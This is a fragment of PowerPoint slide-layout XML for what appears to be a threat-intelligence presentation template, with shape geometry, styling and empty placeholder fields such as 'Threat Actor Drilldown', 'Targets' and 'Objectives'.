            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11580435" y="2223291"/>
              <a:ext cx="729489" cy="729488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 104659"/>
                <a:gd name="connsiteX1" fmla="*/ 104660 w 104659"/>
                <a:gd name="connsiteY1" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX2" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY2" fmla="*/ 104660 h 104659"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 104659"/>
                <a:gd name="connsiteY3" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX4" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1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9" h="104659">
                  <a:moveTo>
                    <a:pt x="52330" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="81165" y="0"/>
                    <a:pt x="104660" y="23495"/>
                    <a:pt x="104660" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104660" y="81165"/>
                    <a:pt x="81165" y="104660"/>
                    <a:pt x="52330" y="104660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23495" y="104660"/>
                    <a:pt x="0" y="81165"/>
                    <a:pt x="0" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="23495"/>
                    <a:pt x="23495" y="0"/>
                    <a:pt x="52330" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln w="21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pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Picture 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC92C55E-19B9-92A1-CA1F-21ED963493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648804" y="2227334"/>
            <a:ext cx="7146845" cy="4766958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="127000" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="454142">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229278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94946"/>
            <a:ext cx="4210461" cy="1004634"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>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75330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2118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70829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at Actor Drilldown">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50EC212E-9B48-3FE1-DFA4-6DB7FF002897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076950" y="1515181"/>
            <a:ext cx="5759450" cy="3964162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1600"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1pPr>
            <a:lvl2pPr marL="233149" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="51000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semibold"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="193675" indent="-193675" algn="l" defTabSz="914367" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr lang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="51000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="193675" indent="-193675" algn="l" defTabSz="914367" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr lang="en-US" sz="1300" kern="1200" dirty="0" smtClean="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="51000">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect r="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="193675" indent="-193675" algn="l" defTabSz="914367" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr lang="en-US" sz="1300" kern="1200" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as: </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Targets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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Objectives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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Activity includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869E7FB5-EF69-21F3-1E18-22B6AF49546A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552697" y="3212975"/>
            <a:ext cx="3960208" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-51" normalizeH="0" baseline="0" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semibold"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>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00059" y="2447775"/>
            <a:ext cx="3079312"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Actor highlight:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10BC87C-FD92-0616-8AD0-ABE159113919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552696" y="4446751"/>
            <a:ext cx="1780067" cy="352343"/>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kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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Country name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB89B74E-E1A9-D2BC-0A42-2FCB5B6BCE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552696" y="3939829"/>
            <a:ext cx="3960207" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="en-US" sz="20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gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="circle">
                    <a:fillToRect l="100000" b="100000"/>
                  </a:path>
                </a:gradFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Formerly</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> _______________</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32202682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ext + Imag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D4F9C0F-DB43-25E5-6E1B-A011C8F303D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="5830095" y="388144"/>
            <a:ext cx="6994524" cy="6218237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY0" fmla="*/ 3497262 h 6218237"/>
              <a:gd name="connsiteX1" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY1" fmla="*/ 6218237 h 6218237"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6994524"/>
              <a:gd name="connsiteY2" fmla="*/ 6218236 h 6218237"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6994524"/>
              <a:gd name="connsiteY3" fmla="*/ 3497261 h 6218237"/>
              <a:gd name="connsiteX4" fmla="*/ 3497262 w 6994524"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6218237"/>
              <a:gd name="connsiteX5" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY5" fmla="*/ 3497262 h 62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4524" h="6218237">
                <a:moveTo>
                  <a:pt x="6994524" y="3497262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6994524" y="6218237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6218236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3497261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1565778"/>
                  <a:pt x="1565778" y="0"/>
                  <a:pt x="3497262" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5428746" y="0"/>
                  <a:pt x="6994524" y="1565778"/>
                  <a:pt x="6994524" y="3497262"/>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8558D1DC-8E6C-7A0F-DCDB-6FEDE26F2B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="2325136"/>
            <a:ext cx="4828468" cy="1003352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"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19" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471E6D8F-1937-E066-D943-63A2A8058ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7636122" y="1697259"/>
            <a:ext cx="3468688" cy="3600008"/>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tIns="365760">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon below </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to replace image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0743B1D7-AC4F-0267-93D3-57B9C13DC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600057" y="3599180"/>
            <a:ext cx="4828469"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="667650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Text + Conten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D4F9C0F-DB43-25E5-6E1B-A011C8F303D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="5830095" y="388144"/>
            <a:ext cx="6994524" cy="6218237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY0" fmla="*/ 3497262 h 6218237"/>
              <a:gd name="connsiteX1" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY1" fmla="*/ 6218237 h 6218237"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 6994524"/>
              <a:gd name="connsiteY2" fmla="*/ 6218236 h 6218237"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 6994524"/>
              <a:gd name="connsiteY3" fmla="*/ 3497261 h 6218237"/>
              <a:gd name="connsiteX4" fmla="*/ 3497262 w 6994524"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6218237"/>
              <a:gd name="connsiteX5" fmla="*/ 6994524 w 6994524"/>
              <a:gd name="connsiteY5" fmla="*/ 3497262 h 62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4524" h="6218237">
                <a:moveTo>
                  <a:pt x="6994524" y="3497262"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6994524" y="6218237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6218236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3497261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1565778"/>
                  <a:pt x="1565778" y="0"/>
                  <a:pt x="3497262" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5428746" y="0"/>
                  <a:pt x="6994524" y="1565778"/>
                  <a:pt x="6994524" y="3497262"/>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8558D1DC-8E6C-7A0F-DCDB-6FEDE26F2B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="2325136"/>
            <a:ext cx="4828468" cy="1003352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"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20" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0743B1D7-AC4F-0267-93D3-57B9C13DC0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600057" y="3599180"/>
            <a:ext cx="4828469"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1160178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at Round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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4B0717C-D6D8-3253-A82A-AC43A1BD6313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567011" y="2748988"/>
            <a:ext cx="11302452" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">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4F6CD2-5734-A2CE-3E85-6E5D72BE5CB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567011" y="4703944"/>
            <a:ext cx="11302452" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">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1740780-36A7-E336-6C9A-8E8D505EAC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567011" y="3726466"/>
            <a:ext cx="11302452" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cap="rnd">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CB9526F2-B362-3812-E5F6-AA9622CEABD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4898636" y="1771510"/>
            <a:ext cx="2639203" cy="3905381"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">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6900" b="0" i="0" u="none" strike="noStrike" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semibold"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13F7FCA-1D83-48E3-7CED-9E96E6E85E36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5358279" y="2450785"/>
            <a:ext cx="1719916" cy="2546830"/>
            <a:chOff x="6892358" y="2956389"/>
            <a:chExt cx="1936281" cy="2867220"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="Group 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D826F13-6247-A0E7-DD53-E8B5ABDD1FBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6892358" y="2956389"/>
              <a:ext cx="1936281" cy="2867220"/>
              <a:chOff x="8142557" y="1108565"/>
              <a:chExt cx="3246303" cy="4807084"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Freeform: Shape 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B432A0-C9EF-AC8A-5EF4-73BF19BD833E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8743258" y="3882387"/>
                <a:ext cx="971582" cy="1079532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 206936 w 342900"/>
                  <a:gd name="connsiteY0" fmla="*/ 103175 h 380999"/>
                  <a:gd name="connsiteX1" fmla="*/ 207449 w 342900"/>
                  <a:gd name="connsiteY1" fmla="*/ 119901 h 380999"/>
                  <a:gd name="connsiteX2" fmla="*/ 157440 w 342900"/>
                  <a:gd name="connsiteY2" fmla="*/ 173136 h 380999"/>
                  <a:gd name="connsiteX3" fmla="*/ 215157 w 342900"/>
                  <a:gd name="connsiteY3" fmla="*/ 173136 h 380999"/>
                  <a:gd name="connsiteX4" fmla="*/ 226089 w 342900"/>
                  <a:gd name="connsiteY4" fmla="*/ 180470 h 380999"/>
                  <a:gd name="connsiteX5" fmla="*/ 223453 w 342900"/>
                  <a:gd name="connsiteY5" fmla="*/ 193386 h 380999"/>
                  <a:gd name="connsiteX6" fmla="*/ 138439 w 342900"/>
                  <a:gd name="connsiteY6" fmla="*/ 277311 h 380999"/>
                  <a:gd name="connsiteX7" fmla="*/ 121730 w 342900"/>
                  <a:gd name="connsiteY7" fmla="*/ 277197 h 380999"/>
                  <a:gd name="connsiteX8" fmla="*/ 121846 w 342900"/>
                  <a:gd name="connsiteY8" fmla="*/ 260471 h 380999"/>
                  <a:gd name="connsiteX9" fmla="*/ 186346 w 342900"/>
                  <a:gd name="connsiteY9" fmla="*/ 196796 h 380999"/>
                  <a:gd name="connsiteX10" fmla="*/ 130108 w 342900"/>
                  <a:gd name="connsiteY10" fmla="*/ 196796 h 380999"/>
                  <a:gd name="connsiteX11" fmla="*/ 119263 w 342900"/>
                  <a:gd name="connsiteY11" fmla="*/ 189662 h 380999"/>
                  <a:gd name="connsiteX12" fmla="*/ 121500 w 342900"/>
                  <a:gd name="connsiteY12" fmla="*/ 176860 h 380999"/>
                  <a:gd name="connsiteX13" fmla="*/ 190234 w 342900"/>
                  <a:gd name="connsiteY13" fmla="*/ 103690 h 380999"/>
                  <a:gd name="connsiteX14" fmla="*/ 206936 w 342900"/>
                  <a:gd name="connsiteY14" fmla="*/ 103175 h 380999"/>
